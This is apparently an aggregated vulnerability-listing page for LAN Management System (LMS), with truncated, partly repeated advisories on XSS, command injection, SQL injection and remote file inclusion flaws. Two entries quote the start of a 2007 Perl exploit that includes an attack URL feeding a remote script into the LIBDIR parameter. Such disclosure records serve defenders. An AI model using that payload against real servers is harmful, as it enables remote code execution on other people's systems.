EUVD-2026-37876

A Reflected Cross-Site Scripting XSS vulnerability exists in LMS LAN Management System before commit 9c5651b in the "dbrecover.php" and "netremap.php" modules where unsanitized GET parameters are directly embedded into HTML output. This allows an attacker to inject arbitrary JavaScript when an...

EUVD-2026-37875

An OS Command Injection vulnerability exists in LMS LAN Management System before commit 9fcb4de due to an IP address parameter being passed to the "exec" function without proper validation, allowing attackers to execute arbitrary operating system commands...

CVE-2026-40455

Affected software: LMS (LAN Management System). Vulnerability: SQL Injection in the tarifflist.php module caused by insufficient sanitization of the POST tg[] parameter; the code concatenates user-supplied array values into an SQL query using implode(). Impact / access: authenticated attackers ca...

EUVD-2007-2200

Malware in sbrugna...

EUVD-2007-2193

Malware in sbrugna...

EUVD-2007-1637

Malware in sbrugna...

LAN Management System (LMS) <= 1.9.6 - Remote File Inclusion Exploit

No description provided by source. !/usr/bin/perl LMS - LAN Management System 1.9.6 - RFI Risk : High Remote Code Execution Url: http://www.lms.org.pl/download/1.9/lms-1.9.6.tar.gz Exploit: http://site.com/path/lib/language.php?LIBDIR=EvilScript coded and f0und3d by Kw3RLn...

Remote file inclusion

PHP remote file inclusion vulnerability in lib/language.php in LAN Management System LMS 1.9.6 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the LIBDIR parameter, a different vector than CVE-2007-1643 and CVE-2007-2205...

CVE-2007-3325

PHP remote file inclusion vulnerability in lib/language.php in LAN Management System LMS 1.9.6 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the LIBDIR parameter, a different vector than CVE-2007-1643 and CVE-2007-2205...

CVE-2007-3325

PHP remote file inclusion vulnerability in lib/language.php in LAN Management System LMS 1.9.6 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the LIBDIR parameter, a different vector than CVE-2007-1643 and CVE-2007-2205...

LAN Management System (LMS) 1.9.6 - Remote File Inclusion

!/usr/bin/perl LMS - LAN Management System 1.9.6 - RFI Risk : High Remote Code Execution Url: http://www.lms.org.pl/download/1.9/lms-1.9.6.tar.gz Exploit: http://site.com/path/lib/language.php?LIBDIR=EvilScript coded and f0und3d by Kw3RLn Romanian Security Team .: hTTp://RSTZONE.NET :. greetz to...

CVE-2007-2205

PHP remote file inclusion vulnerability in modules/rtmessageadd.php in LAN Management System LMS 1.5.3, and possibly 1.5.4, allows remote attackers to execute arbitrary PHP code via a URL in the LIBDIR parameter, a different vector than CVE-2007-1643...

CVE-2007-2205

This CVE (CVE-2007-2205) is a PHP remote file inclusion in LAN Management System (LMS) prior to or around version 1.5.3/1.5.4. The vulnerability is triggered in modules/rtmessageadd.php via the _LIB_DIR parameter, enabling an attacker to load a crafted URL and execute arbitrary PHP code. The avai...

Cross site scripting

Cross-site scripting XSS vulnerability in LAN Management System LMS before 1.6.9 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, probably involving the OD parameter to contrib/formularzprzelewuwplaty/druk.php...

CVE-2007-2198

Cross-site scripting XSS vulnerability in LAN Management System LMS before 1.6.9 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, probably involving the OD parameter to contrib/formularzprzelewuwplaty/druk.php...

CVE-2007-2198

CVE-2007-2198 describes a cross-site scripting (XSS) vulnerability in the LAN Management System (LMS) prior to 1.6.9. The issue allows remote attackers to inject arbitrary web scripts or HTML via unspecified vectors, with likely involvement of the OD parameter in contrib/formularz_przelewu_wplaty...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in LAN Management System LMS 1.8.9 Vala and earlier allow remote attackers to execute arbitrary PHP code via a URL in 1 the CONFIGdirectoriesuserpaneldir parameter to userpanel.php or the 2 LIBDIR parameter to welcome.php...

CVE-2007-1643

Multiple PHP remote file inclusion vulnerabilities in LAN Management System LMS 1.8.9 Vala and earlier allow remote attackers to execute arbitrary PHP code via a URL in 1 the CONFIGdirectoriesuserpaneldir parameter to userpanel.php or the 2 LIBDIR parameter to welcome.php...

CVE-2007-1643

CVE-2007-1643 describes multiple PHP remote file inclusion vulnerabilities in LAN Management System (LMS) 1.8.9 and earlier. The issue allows an attacker to execute arbitrary PHP code by supplying a URL via either (1) CONFIG[directories][userpanel_dir] to userpanel.php or (2) _LIB_DIR to welcome....

CVE-2007-1643

Multiple PHP remote file inclusion vulnerabilities in LAN Management System LMS 1.8.9 Vala and earlier allow remote attackers to execute arbitrary PHP code via a URL in 1 the CONFIGdirectoriesuserpaneldir parameter to userpanel.php or the 2 LIBDIR parameter to welcome.php...